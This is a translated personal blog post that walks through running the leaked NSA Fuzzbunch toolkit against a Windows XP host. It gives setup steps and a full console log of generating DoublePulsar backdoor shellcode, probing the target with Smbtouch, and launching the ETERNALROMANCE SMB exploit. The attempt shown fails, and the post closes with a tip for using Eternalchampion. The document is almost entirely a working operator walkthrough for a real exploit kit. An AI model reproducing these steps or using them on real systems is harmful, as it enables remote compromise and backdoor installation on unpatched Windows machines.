Copyright notice: this article is the blogger's original work and may not be reproduced without the blogger's permission. https://blog.csdn.net/qq_20307987/article/details/80321732
A record of using the NSA exploit ETERNALROMANCE (from the Shadow Brokers leak) against Windows XP / Windows Server 2003.
(1) Environment
python 2.6.6(python-2.6.6.msi)
shadowbroker-master.zip
pywin32-221.win32-py2.6.exe
These can be run on Windows XP or Windows 7, but note: it MUST be a 32-bit system!
(2) Unpack shadowbroker-master.zip and use it for the attack
If you run fb.py straight away you will get an error; create a directory named "listeningposts" under the windows folder, and then it runs.
C:\tools\shadowbroker-master\windows>python fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON
ImplantConfig Autorun List
==========================
0) prompt confirm
1) execute
Exploit Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
====================
0) apply
1) prompt confirm
2) execute
[+] Set FbStorage => C:\tools\shadowbroker-master\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 172.16.17.150
[?] Default Callback IP Address [] : 0.0.0.0
[?] Use Redirection [yes] : no
[?] Base Log directory [D:\logs] : c:\logs
[*] Checking c:\logs for projects
Index Project
----- -------
0 new
1 Create a New Project
[?] Project [0] : 0
[?] Set target log directory to 'c:\logs\new\z172.16.17.150'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 172.16.17.150
[+] Set CallbackIp => 0.0.0.0
[!] Redirection OFF
[+] Set LogDir => c:\logs\new\z172.16.17.150
[+] Set Project => new
fb > use do
Domaintouch Doublepulsar
fb > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.17.150
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 172.16.17.150
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [172.16.17.150] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] :
[*] Function :: Operation for backdoor to perform
*0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[?] Function [0] : 0
[*] OutputFile :: Full path to the output file
[?] OutputFile [] : c:\shellcode1.bin
[+] Set OutputFile => c:\shellcode1.bin
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.17.150] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.17.150:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 172.16.17.150
TargetPort 445
OutputFile c:\shellcode1.bin
Protocol SMB
Architecture x86
Function OutputInstall
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[+] Writing Installer to disk
[*] Deleting old version of OutputFile if it exists
[*] Shellcode written to OutputFile
[+] Doublepulsar Succeeded
fb Payload (Doublepulsar) > use eter
Eternalblue Eternalchampion Eternalromance Eternalsynergy
fb Payload (Doublepulsar) > use Eternalromance
[!] Entering Plugin Context :: Eternalromance
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.17.150
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.17.150
[*] Inheriting Input Variables
[!] Enter Prompt Mode :: Smbtouch
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [172.16.17.150] :
[*] TargetPort :: Port used by the SMB service
[?] TargetPort [445] :
[*] Pipe :: Test an additional pipe to see if it is accessible (optional)
[?] Pipe [] :
[*] Share :: Test a file share to see if it is accessible (optional), entered as hex bytes (in unicode)
[?] Share [] :
[*] Protocol :: SMB (default port 445) or NBT (default port 139)
*0) SMB
1) NBT
[?] Protocol [0] :
[*] Credentials :: Type of credentials to use
*0) Anonymous Anonymous (NULL session)
1) Guest Guest account
2) Blank User account with no password set
3) Password User name and password
4) NTLM User name and NTLM hash
[?] Credentials [0] :
[!] Preparing to Execute Smbtouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Configure Plugin Remote Tunnels
Module: Smbtouch
================
Name Value
---- -----
NetworkTimeout 60
TargetIp 172.16.17.150
TargetPort 445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt False
Pipe
Share
Protocol SMB
Credentials Anonymous
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started
[*] TargetIp 172.16.17.150
[*] TargetPort 445
[*] RedirectedTargetIp (null)
[*] RedirectedTargetPort 0
[*] NetworkTimeout 60
[*] Protocol SMB
[*] Credentials Anonymous
[*] Connecting to target...
[+] Initiated SMB connection
[+] Target OS Version 5.1 build 2600
Windows 5.1
[!] Target could be either SP2 or SP3,
[!] for these SMB exploits they are equivalent
[*] Trying pipes...
[+] spoolss - Success!
[+] Target is 32-bit
[Not Supported]
ETERNALSYNERGY - Target OS version not supported
[Vulnerable]
ETERNALBLUE - DANE
ETERNALROMANCE - FB
ETERNALCHAMPION - DANE/FB
[*] Writing output parameters
[+] Target is vulnerable to 3 exploits
[+] Touch completed successfully
[+] Smbtouch Succeeded
[*] Exporting Contract To Exploit
[+] Set PipeName => spoolss
[+] Set Credentials => Anonymous
[+] Set Target => XP_SP2SP3_X86
[!] Enter Prompt Mode :: Eternalromance
Module: Eternalromance
======================
Name Value
---- -----
NetworkTimeout 60
TargetIp 172.16.17.150
TargetPort 445
PipeName spoolss
ShellcodeFile
ExploitMethod Default
Credentials Anonymous
Protocol SMB
Target XP_SP2SP3_X86
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [172.16.17.150] :
[*] TargetPort :: Target TCP port
[?] TargetPort [445] :
[*] PipeName :: The named pipe to use
[?] PipeName [spoolss] :
[*] ShellcodeFile :: DOPU (ensure correct architecture) ONLY! Other shellcode will likely BSOD.
[?] ShellcodeFile [] : c:\\shellcode1.bin
[+] Set ShellcodeFile => c:\\shellcode1.bin
[*] ExploitMethod :: Which exploit method to use
*0) Default Use the best exploit method(s) for the target OS
1) Fish-in-a-barrel Most reliable exploit method (XP/2k3 only)
2) Matched-pairs Next reliable exploit method (XP/Win7/2k8R2 only)
3) Classic-Romance Original LargePageGroom exploit method (All OS Versions)
[?] ExploitMethod [0] :
[*] Credentials :: Type of credentials to use
*0) Anonymous Anonymous (NULL session)
1) Guest Guest account
2) Blank User account with no password set
3) Password User name and password
4) NTLM User name and NTLM hash
[?] Credentials [0] :
[*] Protocol :: SMB (default port 445) or NBT (default port 139)
*0) SMB
1) NBT
[?] Protocol [0] :
[*] Target :: Operating System, Service Pack, of target OS
0) XP_SP0SP1_X86 Windows XP Sp0 and Sp1, 32-bit
*1) XP_SP2SP3_X86 Windows XP Sp2 and Sp3, 32-bit
2) XP_SP1_X64 Windows XP Sp1, 64-bit
3) XP_SP2_X64 Windows XP Sp2, 64-bit
4) SERVER_2003_SP0 Windows Sever 2003 Sp0, 32-bit
5) SERVER_2003_SP1 Windows Sever 2003 Sp1, 32-bit/64-bit
6) SERVER_2003_SP2 Windows Sever 2003 Sp2, 32-bit/64-bit
7) VISTA_SP0 Windows Vista Sp0, 32-bit/64-bit
8) VISTA_SP1 Windows Vista Sp1, 32-bit/64-bit
9) VISTA_SP2 Windows Vista Sp2, 32-bit/64-bit
10) SERVER_2008_SP0 Windows Server 2008 Sp0, 32-bit/64-bit
11) SERVER_2008_SP1 Windows Server 2008 Sp1, 32-bit/64-bit
12) SERVER_2008_SP2 Windows Server 2008 Sp2, 32-bit/64-bit
13) WIN7_SP0 Windows 7 Sp0, 32-bit/64-bit
14) WIN7_SP1 Windows 7 Sp1, 32-bit/64-bit
15) SERVER_2008R2_SP0 Windows Server 2008 R2 Sp0, 32-bit/64-bit
16) SERVER_2008R2_SP1 Windows Server 2008 R2 Sp1, 32-bit/64-bit
[?] Target [1] :
[!] Preparing to Execute Eternalromance
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.17.150] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.17.150:445
[+] Configure Plugin Remote Tunnels
Module: Eternalromance
======================
Name Value
---- -----
NetworkTimeout 60
TargetIp 172.16.17.150
TargetPort 445
MaxExploitAttempts 3
PipeName spoolss
ExploitMethodChoice 0
ShellcodeFile c:\shellcode1.bin
CredChoice 0
Username
Password
UsingNbt False
OsMajor 5
OsMinor 1
OsServicePack 2
ExploitMethod Default
Credentials Anonymous
Protocol SMB
Target XP_SP2SP3_X86
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Running Exploit
[*] Initializing Parameters
[+] Target 172.16.17.150:445
[+] Authcode: 0x7f4afb0f
[+] XorMask: 0xe9
[+] Network Timeout: 60 seconds
[*] Attempting exploit method 1
[*] Initializing Network
[+] Initial smb session setup completed
[*] Trying pipe spoolss...
[+] Success!
[+] Smb pipe and rpc setup complete
[*] Filling barrel with fish... done
<----------------| Entering Danger Zone |----------------->
[*] Preparing dynamite...
[*] Trying stick 1 (x86)...Miss
[*] Trying stick 2 (x86)...Miss
[*] Trying stick 3 (x86)...Miss
[-] Error 48 (DoRemoteApiLeak)
[-] Error 48 (RunExploitMethod1)
[*] Connections closed, exploit method 1 unsuccessful
[*] Attempting exploit method 2
[*] Initializing Network
[+] Initial smb session setup completed
[*] Trying pipe spoolss...
[+] Success!
[+] Smb pipe and rpc setup complete
[*] Performing initial groom, this may take some time
[*] Sending 36 groom packets........ done
[*] Sending 64 bride packets....... done
<----------------| Entering Danger Zone |----------------->
[*] Invoking leak to find transaction...
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[*] Performing initial groom, this may take some time
[*] Sending 36 groom packets........ done
[*] Sending 64 bride packets....... done
[*] Invoking leak to find transaction...
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[*] Performing initial groom, this may take some time
[*] Sending 36 groom packets........ done
[*] Sending 64 bride packets....... done
[*] Invoking leak to find transaction...
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[-] Error 46 (RunExploitMethod2)
[-] Error 46 (RunPlugin)
[-] Error 46 (processParams)
[!] Plugin failed
[-] Error: Eternalromance Failed
OK!!! It's an error, I don't know why; when I first used it, it succeeded! Guess......
Tip: if you want to use Eternalchampion, you must use the copied byte shellcode as Eternalchampion's payload.
Here is a link: http://www.freebuf.com/articles/system/135270.html